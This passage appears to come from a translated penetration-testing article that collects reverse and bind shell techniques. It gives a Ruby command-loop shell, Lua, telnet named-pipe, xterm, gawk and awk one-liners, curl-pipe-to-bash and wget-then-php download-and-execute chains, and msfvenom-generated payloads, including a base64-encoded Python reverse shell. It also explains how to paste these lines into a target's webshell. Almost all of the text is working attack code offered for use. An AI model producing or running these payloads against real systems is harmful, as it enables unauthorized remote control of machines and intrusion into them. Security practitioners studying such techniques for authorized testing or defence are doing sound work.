And a fuller Ruby version of the kind we know from the MSF world (a simple command loop, not an interactive shell):
#!/usr/bin/env ruby
require 'socket'
require 'open3'

# Set the Remote Host IP
RHOST = "192.168.1.10"
# Set the Remote Host Port
PORT = "6667"

# Tries to connect every 20 sec until it connects.
begin
  sock = TCPSocket.new "#{RHOST}", "#{PORT}"
  sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

# Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do |stdin, stdout_and_stderr|
      IO.copy_stream(stdout_and_stderr, sock)
    end
  end
rescue
  retry
end
8、lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.1.1.19','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"
msf payload:
use payload/cmd/unix/reverse_lua
9、Telnet
When neither nc nor /dev/tcp is available:
mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
Here mknod creates a special file, a named pipe (type p), which carries the shell's output back into telnet.
10、Xterm
First start an X server listening on TCP 6001:
Xnest :1 # Note: the command starts with an uppercase X
Grant the target permission to connect back:
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
If you want to allow anyone to connect:
xhost + # Run this INSIDE the spawned xterm on the open X Server
Assuming xterm is installed on the target, connect it back to your X server:
xterm -display attackerip:1
or:
$ DISPLAY=attackerip:0 xterm
11、gawk (this one listens on port 8080 on the target, i.e. a bind shell; the awk one-liner in the next item connects out)
#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
12、AWK reverse shell
Listen on the attacking machine; once the shell has arrived, do not press Enter on an empty line, or the connection drops.
awk 'BEGIN{s="/inet/tcp/0/x.x.x.x/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
13、curl reverse shell
This relies on the bash one-liner. If there is a command-execution point on the server, running curl ip|bash there, where the index file served at that IP contains the bash one-liner, gives a reverse shell.
For example, write the one-liner into the index file on your own server:
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
192.168.20.151 is the server whose port 7777 is the listener that receives the shell.
Then the single line curl ip|bash on the target connects it back.
Start the listener on Kali first (the original article shows this step as a screenshot).
14、Reverse shell via wget
Use wget to download the payload and execute it:
wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php
Here shell.txt holds the PHP reverse shell from the PHP section above. Start the listener, run the line on the target, and the shell comes back (the original article shows the listener and the result as screenshots).
15、Generating one-liners with msfvenom
While learning this I found that the MSF framework also provides a tool for generating reverse shell one-liners: msfvenom. It is very practical: when we cannot remember any of the one-liners above, as long as we have Metasploit we can run msfvenom -l at any time to look up and generate the command-line one-liner we need. The usage is given below for readers to collect.
Finding the payload path:
Use msfvenom -l together with a keyword filter (e.g. cmd/unix/reverse) to find the paths of the various one-liner payloads.
# msfvenom -l payloads 'cmd/unix/reverse'
As the listing shows, msfvenom supports a very rich set of reverse shell one-liners, almost everything is there; choose according to the target.
Generating a bash one-liner:
Using the payload path found above, the following command generates the one-liner, which is then pasted into the target and run.
# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=12345 R
Generating a one-liner for a stripped-down nc (no -e):
# msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R
What remains is to copy the generated one-liner to the target and run it; a shell comes back.
msfvenom usage example:
(1) Start the listener on the attacking machine
Open a listener on local TCP 12345 on the attacking machine, ready to receive the session (the original article shows the listener as a screenshot).
(2) Get the python one-liner
Use msfvenom to generate a python one-liner in the same way as above with the cmd/unix/reverse_python payload and your lhost/lport (the target must of course have python, which most Linux distributions install by default). The generated line uses .decode('base64'), which only exists in Python 2.
(3) Run the python one-liner on the target
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAgLCBzdWJwcm9jZXNzICAgICAgICAsIG9zICAgICAgICA7ICBob3N0PSIxOTIuMTY4LjMxLjIwMCIgICAgICAgIDsgIHBvcnQ9MTIzNDUgICAgICAgIDsgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgICwgcG9ydCkpICAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICwgMCkgICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgLCAxKSAgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAsIDIpICAgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
Copy the python one-liner generated by msfvenom into the target's webshell and run it. For convenience the original article ran it on Kali as the target and showed the result as a screenshot.
(4) The listener on the attacking machine accepts the connection and the shell is in.